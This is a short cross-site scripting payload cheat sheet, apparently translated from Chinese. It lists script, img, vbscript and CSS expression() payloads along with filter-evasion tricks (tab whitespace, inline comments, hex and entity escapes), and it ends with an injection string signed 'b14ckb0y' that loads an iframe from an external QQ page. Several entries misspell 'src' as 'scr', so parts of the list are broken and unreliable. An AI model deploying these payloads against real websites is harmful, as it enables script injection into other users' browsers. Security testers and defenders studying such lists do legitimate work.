<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["